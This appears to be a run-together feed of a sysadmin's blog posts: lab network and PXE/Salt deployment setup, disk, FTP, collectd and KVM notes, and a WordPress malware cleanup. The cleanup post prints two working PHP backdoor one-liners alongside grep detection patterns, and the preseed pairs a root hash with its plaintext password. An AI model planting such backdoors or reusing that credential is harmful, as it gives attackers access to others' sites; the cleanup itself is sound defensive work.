I create a virtual machine with two interfaces so that our environment is sandboxed, mostly because of the dhcp server we need to run.
After the install, update and upgrade
apt-get update
apt-get upgrade
Make the inside interface static and give it an address
vi /etc/network/interfaces
# The loopback network interface
auto lo
iface lo inet loopback
# The primary network interface (outside)
auto ens160
iface ens160 inet dhcp
# The secondary network interface (inside)
auto ens192
iface ens192 inet static
address 10.20.30.1
netmask 255.255.0.0
Reboot
reboot
Configure kernel to forward packets
vi /etc/sysctl.conf
# Uncomment the next line to enable packet forwarding for IPv4
net.ipv4.ip_forward=1
Add iptable rules to forward packets
iptables -t nat -A POSTROUTING -o ens160 -j MASQUERADE
iptables -A FORWARD -i ens192 -o ens160 -m state --state RELATED,ESTABLISHED -j ACCEPT
iptables -A FORWARD -i ens160 -o ens192 -j ACCEPT
Make the ip tables rules persistent across reboots
apt-get install iptables-persistent
Now to save the iptable rules
netfilter-persistent save
netfilter-persistent reload
Other
sysctl -p
apt-get install netstat-nat
I’m going to combine the deployment services onto one system. It’s a basic Ubuntu 16.04 Server install and I’m calling it “server”.
Let’s install bind9 to have a nameserver running
apt-get install bind9
Edit /etc/bind/named.conf.options to get caching to work and add this
forwarders {
8.8.8.8;
8.8.4.4;
};
Restart bind
systemctl restart bind
Install dnsutils
apt-get install dnsutils
Test the caching
nslookup
server localhost
google.com
Edit /etc/network/interfaces and change the nameserver to localhost
# The primary network interface
auto ens160
iface ens160 inet static
address 10.20.30.10
netmask 255.255.255.0
network 10.20.30.0
broadcast 10.20.30.255
gateway 10.20.30.1
# dns-* options are implemented by the resolvconf package, if installed
dns-nameservers 127.0.0.1
Reboot
reboot
I like to ssh to my router and then ssh to the clients on the inside network instead of working on the vSphere console so I’d like internal clients resolve on the router. In order to do this we need to override the nameserver that the dhcp client gets, this is done in the file /etc/resolvconf/resolv.conf.d/head
vi /etc/resolvconf/resolv.conf.d/head
# Dynamic resolv.conf(5) file for glibc resolver(3) generated by resolvconf(8)
# DO NOT EDIT THIS FILE BY HAND -- YOUR CHANGES WILL BE OVERWRITTEN
nameserver 10.20.30.10
search thunderhouse.com
The warning in the file is talking about /etc/resolv.conf not this file.
Restart networking
systemctl restart networking
Note: another good command to know is
systemctl status networking
Test
root@router:~# nslookup google.com
Server: 10.20.30.10
Address: 10.20.30.10#53
Non-authoritative answer:
Name: google.com
Address: 172.217.4.110
Let’s set up the primary and reverse zones back on our server for the internal network. The computers will name themselves based on the reverse lookup. To add a DNS Forward and Reverse resolution to bind9, edit /etc/bind/named.conf.local
vi /etc/bind/named.conf.local
zone "thunderhouse.com" {
type master;
file "/etc/bind/db.thunderhouse.com";
}
zone "0.30.20.10.in-addr.arpa" {
type master;
notify no;
file "/etc/bind/db.10";
}
Now the file /etc/bind/db.thunderhouse.com will have the details for resolving hostname to IP address for this domain/zone, and the file /etc/bind/db.10 will have the details for resolving IP address to hostname. Now we will add the details which is necessary for forward resolution into /etc/bind/db.thunderhouse.com
First, copy /etc/bind/db.local to /etc/bind/db.thunderhouse.com
cp /etc/bind/db.local /etc/bind/db.thunderhouse.com
Next, edit the /etc/bind/db.thunderhouse.com and replace the following.
In the line which has SOA: localhost. – This is the FQDN of the server in charge for this domain. I’ve installed bind9 in 10.20.30.10, whose hostname is “server”. So replace the “localhost.” with “server.thunderhouse.com.”. Make sure it end’s with a dot(.).
In the line which has SOA: root.localhost. – This is the E-Mail address of the person who is responsible for this server. Use dot(.) instead of @. I’ve replaced with tom.localhost.
In the line which has NS: localhost. - This is defining the Name server for the domain (NS). We have to change this to the fully qualified domain name of the name server. Change it to “server.thunderhouse.com.”. Make sure you have a “.” at the end.
Once the changes are done, the /etc/bind/db.thunderhouse.com file will look like the following:
;
; BIND data file
;
$TTL 604800
@ IN SOA server.thunderhouse.com. tom.localhost. (
5 ; Serial
604800 ; Refresh
86400 ; Retry
2419200 ; Expire
604800 ) ; Negative Cache TTL
;
@ IN NS server.thunderhouse.com.
thunderhouse.com IN MX 10 mail.thunderhouse.com.
router IN A 10.20.30.1
server IN A 10.20.30.10
mail IN A 10.20.30.10
ns IN CNAME 10.20.30.10
ldap IN A 10.20.30.11
www IN A 10.20.30.12
print IN A 10.20.30.15
ad01 IN A 10.20.30.21
joomla IN A 10.20.30.22
kali IN A 10.20.30.23
workstation01 IN A 10.20.30.50
And the reverse zone will look like this:
;
; BIND reverse data file
;
$TTL 604800
@ IN SOA server.thunderhouse.com. tom.localhost. (
7 ; Serial
604800 ; Refresh
86400 ; Retry
2419200 ; Expire
604800 ) ; Negative Cache TTL
;
@ IN NS server.thunderhosue.com.
1 IN PTR router.thunderhouse.com.
10 IN PTR server.thunderhouse.com.
11 IN PTR ldap.thunderhouse.com.
12 IN PTR www.thunderhouse.com.
15 IN PTR print.thunderhouse.com.
21 IN PTR ad01.thunderhouse.com.
22 IN PTR joomla.thunderhouse.com.
23 IN PTR kali.thunderhouse.com.
50 IN PTR workstation01.thunderhouse.com.
Reload dns and check out systemctl status and /var/log/syslog for any errors
systemctl restart bind9
systemctl status bind9
tail -100 /var/log/syslog
We’re going to install the isc dhcp server on the internal network we’ve created.
apt-get install isc-dhcp-server
Edit dhcp server config
vi /etc/dhcp/dhcpd.conf
subnet 10.20.30.0 netmask 255.255.255.0 {
range 10.20.30.40 10.20.30.100;
option routers 10.20.30.1;
}
Restart the dhcp server
systemctl restart isc-dhcp-server
Check it with
systemctl status isc-dhcp-server
This is just a simple configuration to get us going.
Let’s add this to the dhcp configuration, above the subnet declaration.
# option definitions common to all supported networks...
option domain-name "thunderhouse.com";
option domain-name-servers 10.20.30.10;
# iPXE poop
option space ipxe;
option ipxe-encap-opts code 175 = encapsulate ipxe;
option ipxe.priority code 1 = signed integer 8;
option ipxe.keep-san code 8 = unsigned integer 8;
option ipxe.skip-san-boot code 9 = unsigned integer 8;
option ipxe.syslogs code 85 = string;
option ipxe.cert code 91 = string;
option ipxe.privkey code 92 = string;
option ipxe.crosscert code 93 = string;
option ipxe.no-pxedhcp code 176 = unsigned integer 8;
option ipxe.bus-id code 177 = string;
option ipxe.bios-drive code 189 = unsigned integer 8;
option ipxe.username code 190 = string;
option ipxe.password code 191 = string;
option ipxe.reverse-username code 192 = string;
option ipxe.reverse-password code 193 = string;
option ipxe.version code 235 = string;
option iscsi-initiator-iqn code 203 = string;
# Feature indicators
option ipxe.pxeext code 16 = unsigned integer 8;
option ipxe.iscsi code 17 = unsigned integer 8;
option ipxe.aoe code 18 = unsigned integer 8;
option ipxe.http code 19 = unsigned integer 8;
option ipxe.https code 20 = unsigned integer 8;
option ipxe.tftp code 21 = unsigned integer 8;
option ipxe.ftp code 22 = unsigned integer 8;
option ipxe.dns code 23 = unsigned integer 8;
option ipxe.bzimage code 24 = unsigned integer 8;
option ipxe.multiboot code 25 = unsigned integer 8;
option ipxe.slam code 26 = unsigned integer 8;
option ipxe.srp code 27 = unsigned integer 8;
option ipxe.nbi code 32 = unsigned integer 8;
option ipxe.pxe code 33 = unsigned integer 8;
option ipxe.elf code 34 = unsigned integer 8;
option ipxe.comboot code 35 = unsigned integer 8;
option ipxe.efi code 36 = unsigned integer 8;
option ipxe.fcoe code 37 = unsigned integer 8;
option ipxe.vlan code 38 = unsigned integer 8;
option ipxe.menu code 39 = unsigned integer 8;
option ipxe.sdi code 40 = unsigned integer 8;
option ipxe.nfs code 41 = unsigned integer 8;
# pxelinux poop
option space pxelinux;
option pxelinux.magic code 208 = string;
option pxelinux.configfile code 209 = text;
option pxelinux.pathprefix code 210 = text;
option pxelinux.reboottime code 211 = unsigned integer 32;
if exists user-class and option user-class = "iPXE" {
filename "http://server.thunderhouse.com/ipxe/boot.ipxe";
} else {
filename "undionly.kpxe";
}
This if statement will cause the DHCP server to first tell clients to download iPXE. Once iPXE starts up and does another DHCP request, it will be told the actual location of the configuration file to download. Without this, we would end up with a continuous loop of iPXE downloading itself.
The undionly.kpxe image is a PXE image that keeps UNDI loaded and unloads PXE. This is for clients which don’t natively support iPXE, which is pretty much everyone.
We need to build the undionly.kpxe image. First, install the dependencies.
apt-get install build-essential
apt-get install liblzma-dev
clone the image source
git clone git://git.ipxe.org/ipxe.git
Let’s make the image
cd ipxe/src
make
We need a tftp server to host the iPXE image we just created
apt-get install tftpd-hpa
Now move the iPXE image into place
cp ~/ipxe/src/bin/undionly.kpxe /var/lib/tftpboot
Check the status
systemctl status tftpd-hpa
We need a web server to serve the ipxe files, the preseed file and the install service.
apt-get install apache2
systemctl status apache2
We’ll install the salt master from apt.
apt-get install salt-master
systemctl status salt-master
mkdir -p /srv/salt
mkdir -p /srv/formulas
vi /etc/salt/autosign.conf
Make it look like this:
www.thunderhouse.com
print.thunderhouse.com
ldap.thunderhouse.com
www.thunderhouse.com
WORKSTATION[0-9]{2}.THUNDERHOUSE.COM
workstation[0-9]{2}.thunderhouse.com
We’ll use apache’s default location for serving web files, /var/www/html
#!ipxe
# Global variables used by all other iPXE scripts
chain --autofree boot.ipxe.cfg ||
# Boot <boot-url>/menu.ipxe script if all other options have been exhausted
chain --replace --autofree ${menu-url} ||
#!ipxe
## OPTIONAL: Base URL used to resolve most other resources
## Should always end with a slash
set boot-url http://server.thunderhouse.com
# REQUIRED: Absolute URL to the menu script, used by boot.ipxe
# and commonly used at the end of simple override scripts
# in ${boot-dir}.
set menu-url ${boot-url}/menu.ipxe
# where we put our configs
#set config-dir ${boot-url}/configs
set config-dir ${boot-url}
# fedora bits
set fedora-mirror http://mirror.mit.edu/fedora/linux/releases
set fedora-release 23
set fedora-next 24
#Ubuntu bits
set ubuntu-mirror http://mirrors.mit.edu/ubuntu-releases/
set ubuntu-release 16.04
# memtest bits
# note: the plus (+) doesn't work in the url
#set memtest-latest ${config-dir}/memtest/memtest86plus-5.01.iso
# Some menu defaults
set menu-timeout 5000
set submenu-timeout ${menu-timeout}
isset ${menu-default} || set menu-default exit
# Figure out if client is 64-bit capable
cpuid --ext 29 && set arch x64 || set arch x86
cpuid --ext 29 && set archl amd64 || set archl i386
#!ipxe
# Variables are specified in boot.ipxe.cfg
###################### MAIN MENU ####################################
:start
menu iPXE boot menu
item --key u ubuntu Boot Ubuntu ${ubuntu-release} Installer
item
# item --key d menu-diag Diagnostics tools...
item
item reboot Reboot computer
item --key x exit Exit iPXE and continue BIOS boot
choose --timeout ${menu-timeout} --default ${menu-default} selected || goto cancel
set menu-timeout 0
goto ${selected}
:shell
echo Type 'exit' to get the back to the menu
shell
set menu-timeout 0
set submenu-timeout 0
goto start
:cancel
echo You cancelled the menu, dropping you to a shell
goto shell
:failed
echo Booting failed, dropping to shell
goto shell
:reboot
reboot
:exit
exit
:config
config
goto start
:back
set submenu-timeout 0
clear submenu-default
goto start
############ MAIN MENU ITEMS ############
:ubuntu
#chain --autofree --replace ${config-dir}/ubuntu/${ubuntu-release}/install.ipxe || goto failed
chain --autofree --replace ubuntu.ipxe || goto failed
# :menu-diag
# chain --autofree --replace ${boot-url}/menu.diag.ipxe
#!ipxe
dhcp
# Variables are specified in boot.ipxe.cfg
set base-url http://mirrors.mit.edu/ubuntu/dists/xenial/main/installer-amd64/current/images/netboot/ubuntu-installer/amd64/
kernel ${base-url}/linux
initrd ${base-url}/initrd.gz
imgargs linux auto=true url=http://server.thunderhouse.com/preseed.cfg hostname=${hostname} domain=thunderhouse.com
boot
The example preseed file is located here: wget https://help.ubuntu.com/16.04/installation-guide/example-preseed.txt However you should use mine, the example doesn’t have everything, do a diff if you want to see the difference.
To generate the password hash, install the mkpasswd command which is in the whois package:
apt-get install whois
mkpasswd -m sha-512
The hashed password is Passsword1
d-i debian-installer/locale string en_US
d-i console-setup/ask_detect boolean false
d-i keyboard-configuration/xkb-keymap select us
d-i keyboard-configuration/layoutcode string us
d-i netcfg/choose_interface select auto
d-i netcfg/get_hostname string unassigned-hostname
d-i netcfg/get_domain string unassigned-domain
d-i netcfg/wireless_wep string
d-i mirror/country string manual
d-i mirror/http/hostname string archive.ubuntu.com
d-i mirror/http/directory string /ubuntu
d-i mirror/http/proxy string
d-i passwd/root-login boolean true
d-i passwd/make-user boolean false
d-i passwd/root-password-crypted password $6$46V.E/.7e2hpmE$4JQSRGhVrrb/HthkQ27WWUlAROz/1Sm9iDfRwbh2V24xYG7OsxlgWnpTqitPxzn67Sa1KtiGOoUKkU6M/NvQ70
d-i user-setup/encrypt-home boolean false
d-i clock-setup/utc boolean true
d-i time/zone string US/Eastern
d-i clock-setup/ntp boolean true
d-i partman-auto/method string regular
d-i partman-lvm/device_remove_lvm boolean true
d-i partman-md/device_remove_md boolean true
d-i partman-lvm/confirm boolean true
d-i partman-lvm/confirm_nooverwrite boolean true
d-i partman-auto/choose_recipe select atomic
d-i partman-partitioning/confirm_write_new_label boolean true
d-i partman/choose_partition select finish
d-i partman/confirm boolean true
d-i partman/confirm_nooverwrite boolean true
d-i partman-md/confirm boolean true
d-i partman-partitioning/confirm_write_new_label boolean true
d-i partman/choose_partition select finish
d-i partman/confirm boolean true
d-i partman/confirm_nooverwrite boolean true
tasksel tasksel/first multiselect ubuntu-server
d-i pkgsel/include string wget
d-i pkgsel/update-policy select none
d-i grub-installer/only_debian boolean true
d-i grub-installer/with_other_os boolean true
d-i finish-install/reboot_in_progress note
d-i preseed/late_command string sed -i 's/^GRUB_HIDDEN_TIMEOUT=0/GRUB_HIDDEN_TIMEOUT=5/' /etc/default/grub; \
in-target sed -i 's/^GRUB_HIDDEN_TIMEOUT_QUIET=true/GRUB_HIDDEN_TIMEOUT_QUIET=false/' /etc/default/grub; \
in-target update-grub; \
in-target mkdir /usr/share/mitmath; \
in-target wget -O /usr/share/mitmath/ubuntu-install http://server.thunderhouse.com/ubuntu-install; \
in-target chmod 755 /usr/share/mitmath/ubuntu-install; \
in-target wget -O /lib/systemd/system/ubuntu-install.service http://server.thunderhouse.com/ubuntu-install.service; \
in-target systemctl enable ubuntu-install.service; \
in-target systemctl start ubuntu-install.service; \
in-target sed -i '1 i\Please wait while system finishes configuration...' /etc/issue
#!/bin/bash
salt_master="server.thunderhouse.com"
# show a message on the splash screen with our progress
# restart splash screen if the process is gone
message () {
pgrep plymouthd || plymouthd && plymouth show-splash
plymouth message --text="This workstation is being configured. Please wait, and do not reboot... ${1}..."
}
#sed '1 i\ Please wait while system finishes configuration...' /etc/issue
# can't do anything here without network
count=0
until [ $(ping -c 1 server.thunderhouse.com > /dev/null 2>&1 ; echo $?) = "0" ] ||
[ $count = "30" ]
do
# message "waiting for network"
echo "waiting for network" 1> /dev/tty1
sleep 2
let count=$count+1
done
if [ $count = "10" ]; then
echo "where's my network? dropping out."
exit 1
fi
# start SSH for debugging
systemctl start ssh
# make sure system time is correct
# message "setting correct system time"
echo "setting correct system time" 1> /dev/tty1
systemctl start chronyd
chronyc waitsync
# install salt
#message "installing salt"
echo "installing salt" 1> /dev/tty1
#yum -qy install salt-minion
apt-get --yes -q install python-software-properties
apt-add-repository ppa:saltstack/salt -y
apt-get --yes -q update
apt-get install --yes -q salt-minion
mkdir /etc/salt/minion.d
echo "master: ${salt_master}" > /etc/salt/minion.d/server.thunderhouse.com.conf
systemctl enable salt-minion
salt_return=1
until [ $salt_return -eq 0 ]; do
# message "Waiting for the Salt Master to accept our key..."
echo "Waiting for the Salt Master to accept our key..." 1> /dev/tty
#salt-call test.ping && salt_return=0 || salt_return=1; sleep 30
systemctl start salt-minion.service
systemctl status salt-minion.service && salt_return=0 || salt_return=1; sleep 30
done
#message "Running system salt configurations..."
echo "Running system salt configurations..." 1> /dev/tty1
salt-call --log-level=quiet --out-file=/tmp/salt state.highstate
# salt exits clean with a status of "0"
if [ $? -eq 0 ]; then
mail -s "$(hostname) install complete." tmullaly@gmail.com </tmp/salt state.highstate
systemctl disable ubuntu-install.service
echo "Configuration success!!! Rebooting..." 1> /dev/tty1
sleep 5;
sed -i '1d' /etc/issue
reboot
else
# message "Something went wrong :( SSH in to check."
echo "Something went wrong :( SSH in to check." 1> /dev/tty1
fi
[Unit]
Description=Ubuntu Installer
After=network.target
Before=display-manager.service
Conflicts=display-manager.service
[Service]
Type=oneshot
ExecStart=/usr/share/installer/ubuntu-install
[Install]
WantedBy=network.target
Create the directory /srv/salt
mkdir -p /srv/salt
base:
'*':
- vm-tools
'print*':
- test
'workstation*':
- scratch
There are three salt states here, vm-tools gets applied to all hosts. test gets applied to the print servers and scratch gets applied to the workstations.
{% if grains['os_family'] == 'Debian' %}
installing_vm-tools:
pkg.installed:
- name: open-vm-tools
{% endif %}
{% if grains['os_family'] == 'RedHat' %}
installing_vm-tools:
pkg.installed:
- name: open-vm-tools
{% endif %}
/test:
file:
- managed
- user: root
- group: root
/scratch:
file.directory:
- user: root
- group: root
- mode: 1777
Create a new vm on the internal network.
When it boots, hit f2 and make the network interface the first boot device.
Shut it down and get the mac address it created from the vSphere interface.
Edit /etc/dhcp/dhcpd.conf and add it to the bottom.
host www {
hardware ethernet 00:0c:29:2e:fe:ae;
fixed-address www.thunderhouse.com;
}
Restart the dhcp server
systemctl restart isc-dhcp-server
We’ll use the apache and the php formulas from github
cd /srv/formulas
git clone https://github.com/saltstack-formulas/php-formula
git clone https://github.com/saltstack-formulas/apache-formula
Add formula location to the salt master file
Edit the master file on the salt master server
vi /etc/salt/master
The file_roots section will look like this.
file_roots:
base:
- /srv/salt
- /srv/formulas/openldap-formula
- /srv/formulas/apache-formula
- /srv/formulas/ntp-formula
- /srv/formulas/openssh-formula
Save it ans restart the salt master service.
systemctl restart salt-master
systemctl status salt-master
Add www to /srv/salt/top.sls
vi /srv/salt/top.sls
It’ll look something like this:
base:
'*':
- vm-tools
'www*':
- apache
- php
'print*':
- test
'ldap*':
- apache
- openldap.server
- ntp
'workstation*':
- scratch
- ubuntu-desktop
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 |
|
Stop X from starting up Edit /etc/default/grub with your favorite editor, eg: nano:
sudo nano /etc/default/grub
Find out this line:
GRUB_CMDLINE_LINUX_DEFAULT=”quiet splash”
Change it to:
GRUB_CMDLINE_LINUX_DEFAULT=”text”
Update Grub:
sudo update-grub
you can start X by typing startx
Performance: mount /nsm on separate disk
]]>Edit the Policy: Computer -> Policies -> Administrative Templates
Network/Network Connections/Windows Firewall/Domain Profile
Windows Firewall: Allow ICMP exceptions: Enabled
Windows Firewall: Allow inbound remote administration exception: Enabled
I would only allow from one ip address, that of a dc, for now anyway.
Link the policy to the OU that contains the computer accounts that you want to apply the policy to.
You should be able to use the shutdown /i command on the allowed server and reboot (or shutdown) the doamin computers.
]]>I had mounted a 100 GB virtual disk on /backups, now I’m replacing it with a 300 GB virtual disk.
root@itserver:~# fdisk /dev/sdc
Device contains neither a valid DOS partition table, nor Sun, SGI or OSF disklabel
Building a new DOS disklabel with disk identifier 0x6cac81a9.
Changes will remain in memory only, until you decide to write them.
After that, of course, the previous content won't be recoverable.
Warning: invalid flag 0x0000 of partition table 4 will be corrected by w(rite)
Command (m for help): p
Disk /dev/sdc: 322.1 GB, 322122547200 bytes
255 heads, 63 sectors/track, 39162 cylinders, total 629145600 sectors
Units = sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disk identifier: 0x6cac81a9
Device Boot Start End Blocks Id System
Command (m for help): m
Command action
a toggle a bootable flag
b edit bsd disklabel
c toggle the dos compatibility flag
d delete a partition
l list known partition types
m print this menu
n add a new partition
o create a new empty DOS partition table
p print the partition table
q quit without saving changes
s create a new empty Sun disklabel
t change a partition's system id
u change display/entry units
v verify the partition table
w write table to disk and exit
x extra functionality (experts only)
Command (m for help): n
Partition type:
p primary (0 primary, 0 extended, 4 free)
e extended
Select (default p):
Using default response p
Partition number (1-4, default 1):
Using default value 1
First sector (2048-629145599, default 2048):
Using default value 2048
Last sector, +sectors or +size{K,M,G} (2048-629145599, default 629145599):
Using default value 629145599
Command (m for help): w
The partition table has been altered!
Calling ioctl() to re-read partition table.
Syncing disks.
root@itserver:~# mkfs.ext4 /dev/sdc1
mke2fs 1.42.9 (4-Feb-2014)
Filesystem label=
OS type: Linux
Block size=4096 (log=2)
Fragment size=4096 (log=2)
Stride=0 blocks, Stripe width=0 blocks
19660800 inodes, 78642944 blocks
3932147 blocks (5.00%) reserved for the super user
First data block=0
Maximum filesystem blocks=4294967296
2400 block groups
32768 blocks per group, 32768 fragments per group
8192 inodes per group
Superblock backups stored on blocks:
32768, 98304, 163840, 229376, 294912, 819200, 884736, 1605632, 2654208,
4096000, 7962624, 11239424, 20480000, 23887872, 71663616
Allocating group tables: done
Writing inode tables: done
Creating journal (32768 blocks): done
Writing superblocks and filesystem accounting information: done
root@itserver:~# mount /dev/sdc1 /backups
root@itserver:~# mount
/dev/sda1 on / type ext4 (rw,errors=remount-ro)
proc on /proc type proc (rw,noexec,nosuid,nodev)
sysfs on /sys type sysfs (rw,noexec,nosuid,nodev)
none on /sys/fs/cgroup type tmpfs (rw)
none on /sys/fs/fuse/connections type fusectl (rw)
none on /sys/kernel/debug type debugfs (rw)
none on /sys/kernel/security type securityfs (rw)
udev on /dev type devtmpfs (rw,mode=0755)
devpts on /dev/pts type devpts (rw,noexec,nosuid,gid=5,mode=0620)
tmpfs on /run type tmpfs (rw,noexec,nosuid,size=10%,mode=0755)
none on /run/lock type tmpfs (rw,noexec,nosuid,nodev,size=5242880)
none on /run/shm type tmpfs (rw,nosuid,nodev)
none on /run/user type tmpfs (rw,noexec,nosuid,nodev,size=104857600,mode=0755)
none on /sys/fs/pstore type pstore (rw)
/dev/sdb1 on /backups-old type ext4 (rw)
/dev/sdc1 on /backups type ext4 (rw)
root@itserver:~# vi /etc/fstab
# /etc/fstab: static file system information.
#
# Use 'blkid' to print the universally unique identifier for a
# device; this may be used with UUID= as a more robust way to name devices
# that works even if disks are added and removed. See fstab(5).
#
# <file system> <mount point> <type> <options> <dump> <pass>
# / was on /dev/sda1 during installation
UUID=5983a692-a8a0-4b8d-a5b0-45143fc6b816 / ext4 errors=remount-ro 0 1
# swap was on /dev/sda5 during installation
UUID=dad51df4-05e7-4eae-900d-49483ed33b3c none swap sw 0 0
/dev/fd0 /media/floppy0 auto rw,user,noauto,exec,utf8 0 0
# backup disk
/dev/sdb1 /backups-old ext4 defaults 1 2
/dev/sdc1 /backups ext4 defaults 1 2
now reboot to test
]]>apt-get install pure-ftpd
cd /etc/pure-ftpd/conf
echo "41000 42000" > PassivePortRange
echo "yes" > DontResolve
echo "33" > MinUID
pure-pw useradd someuser -u www-data -d /var/www
pure-pw mkdb
cd /etc/pure-ftpd/auth
ln -s ../conf/PureDB 50pure
/etc/init.d/purftpd restart
iptables -A INPUT -s $ip -p udp --dport 21 -j ACCEPT
iptables -A INPUT -s $ip -p tcp --dport 21 -j ACCEPT
iptables -A INPUT -s $ip -p udp --dport 41000:42000 -j ACCEPT
iptables -A INPUT -s $ip -p tcp --dport 41000:42000 -j ACCEPT
apt-get install collectd collectd-utils
vi /etc/collectd/collectd.conf
service collectd restart
/var/ossec/bin/syscheck_update -u local
cd /var
mkdir www
cd www
cp -r /usr/share/doc/collectd/examples/collection3 .
apt-get install librrds-perl libconfig-general-perl libhtml-parser-perl libregexp-common-perl
apt-get install fast-cgi
apt-get install spawn-fcgi fcgiwrap
location /nginx_status {
stub_status on;
access_log off;
allow 127.0.0.1;
deny all;
}
location ~ .cgi$ {
root /var/www;
fastcgi_pass unix:/var/run/fcgiwrap.socket;
include /etc/nginx/fastcgi_params;
}
location /collection3/share/ {
alias /var/www/collection3/share/;
}
service nginx restart
The process to patch is to apt-get update. apt-get upgrade, then update ossec’s database. This might be automated in the future. I’m leaving the default ubuntu 12.04 AppArmor policies in place.
]]>I’m using my old mac pro as my KVM server and it has two interfaces. I’m going to bridge the second interface.
Install bridge-utils:
apt-get install bridge-utils
Edit /etc/network/interfaces file:
# This file describes the network interfaces available on your system
# and how to activate them. For more information, see interfaces(5).
# The loopback network interface
auto lo
iface lo inet loopback
# The primary network interface
auto eth0
iface eth0 inet static
address 10.0.1.10
netmask 255.255.255.0
gateway 10.0.1.1
dns-nameservers 8.8.8.8 8.8.4.4
#auto eth1
#iface eth1 inet manual
auto br0
iface br0 inet dhcp
bridge_ports eth1
bridge_stp off
bridge_fd 0
bridge_maxwait 0
Restart networking:
service networking restart
tom@kvm:~$ brctl show
bridge name bridge id STP enabled interfaces
br0 8000.0017f20dd411 no eth1
virbr0 8000.000000000000 yes
create file br0.xml
<network>
<name>br0</name>
<forward mode="bridge"/>
<bridge name="br0" />
</network>
virsh net-list –all
Name State Autostart Persistent
----------------------------------------------------------
default active yes yes
Define the bridged interface
virsh net-define br0.xml
virsh net-list –all
Name State Autostart Persistent
----------------------------------------------------------
br0 active no yes
default active yes yes
virsh net-start br0
virsh edit (domain name)
Change the networking config from:
<interface type='network'>
<mac address='52:54:00:a6:99:d9'/>
<source network='default'/>
<model type='virtio'/>
<address type='pci' domain='0x0000' bus='0x00' slot='0x03' function='0x0'/>
</interface>
to:
<interface type='network'>
<mac address='52:54:00:f9:b7:7f'/>
<source network='br0'/>
<model type='virtio'/>
<address type='pci' domain='0x0000' bus='0x00' slot='0x03' function='0x0'/>
</interface>
virsh # start Cent7Test
virsh # dominfo Cent7Test
Id: 5
Name: Cent7Test
UUID: 17a23e76-ecf6-e0b6-f0d2-7c249d95b862
OS Type: hvm
State: running
CPU(s): 1
CPU time: 24.9s
Max memory: 1048576 KiB
Used memory: 1048576 KiB
Persistent: yes
Autostart: disable
Managed save: no
Security model: apparmor
Security DOI: 0
Security label: libvirt-17a23e76-ecf6-e0b6-f0d2-7c249d95b862 (enforcing)
list all domain virtual interfaces
virsh # domiflist Centos7
Interface Type Source Model MAC
-------------------------------------------------------
vnet1 bridge br0 virtio 52:54:00:e3:b5:20
get network interface stats for a domain
virsh # domifstat Centos7 vnet1
vnet1 rx_bytes 27319
vnet1 rx_packets 333
vnet1 rx_errs 0
vnet1 rx_drop 0
vnet1 tx_bytes 4677
vnet1 tx_packets 30
vnet1 tx_errs 0
vnet1 tx_drop 0
find . -name "*.php" | xargs grep "gzinflate(base64_decode"
Basically, there’s malicious code inserted into the beginning of the php script and it is base64 enconded and compressed so if you look at the file, the first line looks like garbarge. There’s a backdoor on the system that keeps it coming back. I remove it with the following one liner:
find -name "*.php" -exec sed -i '/<?.*eval(gzinflate(base64.*?>/ d' '{}' \; -print
Here’s the code uncompressed and decoded:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 |
|
Another issue is with the .htaccess files being written to. I search for all of the .htaccess files and check for strings that are know to me that are not supposed to be there.
find . -name "*.htaccess" | xargs grep "windows-media-player"
find . -name "*.htaccess" | xargs grep "moby"
find . -name "*.htaccess" | xargs grep "click"
The SEO spam was primarilly being generated from a forum directory that was created. This is what most concerns me, so instead of removing the forum directory, and have it put back by a back door, I changed the permissons on the directory to be 000 or not readable, not writeable and not excutable for user, group and world. I also changed the ownership to be owned by root and the group to be root so that the webserver can’t write over it, or recreate it. It also returns a 403 Permission denied when someone tries to access it.
find . -name "forum" | xargs ls -la
./wordpress/domain-one.com/htdocs/forum:
total 20
d--------- 2 root root 4096 Mar 13 13:19 .
drwxr-xr-x 6 www-data www-data 4096 Mar 13 13:19 ..
-rwxr-xr-x 1 root root 84 Mar 4 14:47 .htaccess
-rwxr-xr-x 1 root root 4993 Mar 13 13:19 post.php
I’m performing md5hashes on a clean install of wordpress and comparing them to the equivilant files on the server. This one liner, does it for all files in a directory.
for file in *; do md5sum $file; done
I found another malicious file called sopka.php
root@bserver:/var/www/wordpress# locate sopka.php | xargs md5sum
3800aa78d035d209cfaf64206cdcee6d /var/www/wordpress/domain-one.com/htdocs/sopka.php
3800aa78d035d209cfaf64206cdcee6d /var/www/wordpress/domaon-two.com/htdocs/sopka.php
3800aa78d035d209cfaf64206cdcee6d /var/www/wordpress/domain-three.com/htdocs/sopka.php
3800aa78d035d209cfaf64206cdcee6d /var/www/wordpress/domain-four.com/htdocs/sopka.php
I chmod’d them all 000, this is the contents:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 |
|
There’s also these malicous files, called sidebar.php and footer.php, I chmod’d them all to 000
locate sidebar.php | xargs grep bwinpoker
locate footer.php | xargs grep bwinpoker
Here are the backdoors:
<? php if(@md5($_SERVER['HTTP_PATH'])==='5cd2973f835de94b560b62465d5a37f3'){ @extract($_REQUEST); @die($stime($mtime)); } ?>
And
<?php add_action('init', create_function('', implode("\n", array_map("base64_decode", unserialize(get_option("wptheme_opt")))))); ?>
Netmask Netmask (binary) CIDR Notes
_____________________________________________________________________________
255.255.255.255 11111111.11111111.11111111.11111111 /32 Host (single addr)
255.255.255.254 11111111.11111111.11111111.11111110 /31 Unuseable
